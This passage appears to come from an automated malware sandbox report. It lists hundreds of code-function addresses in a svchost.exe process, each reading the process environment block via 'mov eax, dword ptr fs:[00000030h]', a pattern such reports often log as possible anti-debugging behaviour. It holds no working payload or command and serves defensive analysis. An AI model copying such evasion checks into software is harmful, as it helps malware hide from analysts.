            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]1_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334260 mov eax, dword ptr fs:[00000030h]1_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334260 mov eax, dword ptr fs:[00000030h]1_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334260 mov eax, dword ptr fs:[00000030h]1_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332826B mov eax, dword ptr fs:[00000030h]1_2_0332826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A250 mov eax, dword ptr fs:[00000030h]1_2_0332A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336259 mov eax, dword ptr fs:[00000030h]1_2_03336259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA250 mov eax, dword ptr fs:[00000030h]1_2_033EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA250 mov eax, dword ptr fs:[00000030h]1_2_033EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B8243 mov eax, dword ptr fs:[00000030h]1_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B8243 mov ecx, dword ptr fs:[00000030h]1_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402A0 mov eax, dword ptr fs:[00000030h]1_2_033402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402A0 mov eax, dword ptr fs:[00000030h]1_2_033402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov ecx, dword ptr fs:[00000030h]1_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]1_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E284 mov eax, dword ptr fs:[00000030h]1_2_0336E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E284 mov eax, dword ptr fs:[00000030h]1_2_0336E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h]1_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h]1_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h]1_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h]1_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h]1_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h]1_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]1_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03360124 mov eax, dword ptr fs:[00000030h]1_2_03360124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA118 mov ecx, dword ptr fs:[00000030h]1_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h]1_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h]1_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h]1_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F0115 mov eax, dword ptr fs:[00000030h]1_2_033F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]1_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]1_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]1_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]1_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]1_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C156 mov eax, dword ptr fs:[00000030h]1_2_0332C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C8158 mov eax, dword ptr fs:[00000030h]1_2_033C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336154 mov eax, dword ptr fs:[00000030h]1_2_03336154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336154 mov eax, dword ptr fs:[00000030h]1_2_03336154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]1_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]1_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov ecx, dword ptr fs:[00000030h]1_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]1_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]1_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]1_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]1_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]1_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]1_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h]1_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h]1_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h]1_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034061E5 mov eax, dword ptr fs:[00000030h]1_2_034061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03370185 mov eax, dword ptr fs:[00000030h]1_2_03370185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EC188 mov eax, dword ptr fs:[00000030h]1_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EC188 mov eax, dword ptr fs:[00000030h]1_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4180 mov eax, dword ptr fs:[00000030h]1_2_033D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4180 mov eax, dword ptr fs:[00000030h]1_2_033D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033601F8 mov eax, dword ptr fs:[00000030h]1_2_033601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]1_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F61C3 mov eax, dword ptr fs:[00000030h]1_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F61C3 mov eax, dword ptr fs:[00000030h]1_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6030 mov eax, dword ptr fs:[00000030h]1_2_033C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A020 mov eax, dword ptr fs:[00000030h]1_2_0332A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C020 mov eax, dword ptr fs:[00000030h]1_2_0332C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]1_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B4000 mov ecx, dword ptr fs:[00000030h]1_2_033B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]1_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335C073 mov eax, dword ptr fs:[00000030h]1_2_0335C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332050 mov eax, dword ptr fs:[00000030h]1_2_03332050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6050 mov eax, dword ptr fs:[00000030h]1_2_033B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F60B8 mov eax, dword ptr fs:[00000030h]1_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F60B8 mov ecx, dword ptr fs:[00000030h]1_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C80A8 mov eax, dword ptr fs:[00000030h]1_2_033C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333208A mov eax, dword ptr fs:[00000030h]1_2_0333208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C0F0 mov eax, dword ptr fs:[00000030h]1_2_0332C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033720F0 mov ecx, dword ptr fs:[00000030h]1_2_033720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0332A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033380E9 mov eax, dword ptr fs:[00000030h]1_2_033380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B60E0 mov eax, dword ptr fs:[00000030h]1_2_033B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B20DE mov eax, dword ptr fs:[00000030h]1_2_033B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336273C mov eax, dword ptr fs:[00000030h]1_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336273C mov ecx, dword ptr fs:[00000030h]1_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336273C mov eax, dword ptr fs:[00000030h]1_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AC730 mov eax, dword ptr fs:[00000030h]1_2_033AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C720 mov eax, dword ptr fs:[00000030h]1_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C720 mov eax, dword ptr fs:[00000030h]1_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330710 mov eax, dword ptr fs:[00000030h]1_2_03330710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03360710 mov eax, dword ptr fs:[00000030h]1_2_03360710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C700 mov eax, dword ptr fs:[00000030h]1_2_0336C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338770 mov eax, dword ptr fs:[00000030h]1_2_03338770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330750 mov eax, dword ptr fs:[00000030h]1_2_03330750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE75D mov eax, dword ptr fs:[00000030h]1_2_033BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372750 mov eax, dword ptr fs:[00000030h]1_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372750 mov eax, dword ptr fs:[00000030h]1_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B4755 mov eax, dword ptr fs:[00000030h]1_2_033B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov esi, dword ptr fs:[00000030h]1_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov eax, dword ptr fs:[00000030h]1_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov eax, dword ptr fs:[00000030h]1_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033307AF mov eax, dword ptr fs:[00000030h]1_2_033307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E47A0 mov eax, dword ptr fs:[00000030h]1_2_033E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D678E mov eax, dword ptr fs:[00000030h]1_2_033D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033347FB mov eax, dword ptr fs:[00000030h]1_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033347FB mov eax, dword ptr fs:[00000030h]1_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE7E1 mov eax, dword ptr fs:[00000030h]1_2_033BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333C7C0 mov eax, dword ptr fs:[00000030h]1_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B07C3 mov eax, dword ptr fs:[00000030h]1_2_033B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E627 mov eax, dword ptr fs:[00000030h]1_2_0334E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03366620 mov eax, dword ptr fs:[00000030h]1_2_03366620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368620 mov eax, dword ptr fs:[00000030h]1_2_03368620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333262C mov eax, dword ptr fs:[00000030h]1_2_0333262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372619 mov eax, dword ptr fs:[00000030h]1_2_03372619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE609 mov eax, dword ptr fs:[00000030h]1_2_033AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03362674 mov eax, dword ptr fs:[00000030h]1_2_03362674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F866E mov eax, dword ptr fs:[00000030h]1_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F866E mov eax, dword ptr fs:[00000030h]1_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A660 mov eax, dword ptr fs:[00000030h]1_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A660 mov eax, dword ptr fs:[00000030h]1_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334C640 mov eax, dword ptr fs:[00000030h]1_2_0334C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033666B0 mov eax, dword ptr fs:[00000030h]1_2_033666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C6A6 mov eax, dword ptr fs:[00000030h]1_2_0336C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334690 mov eax, dword ptr fs:[00000030h]1_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334690 mov eax, dword ptr fs:[00000030h]1_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B06F1 mov eax, dword ptr fs:[00000030h]1_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B06F1 mov eax, dword ptr fs:[00000030h]1_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A6C7 mov eax, dword ptr fs:[00000030h]1_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6500 mov eax, dword ptr fs:[00000030h]1_2_033C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338550 mov eax, dword ptr fs:[00000030h]1_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338550 mov eax, dword ptr fs:[00000030h]1_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033545B1 mov eax, dword ptr fs:[00000030h]1_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033545B1 mov eax, dword ptr fs:[00000030h]1_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E59C mov eax, dword ptr fs:[00000030h]1_2_0336E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332582 mov eax, dword ptr fs:[00000030h]1_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332582 mov ecx, dword ptr fs:[00000030h]1_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364588 mov eax, dword ptr fs:[00000030h]1_2_03364588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033325E0 mov eax, dword ptr fs:[00000030h]1_2_033325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C5ED mov eax, dword ptr fs:[00000030h]1_2_0336C5ED
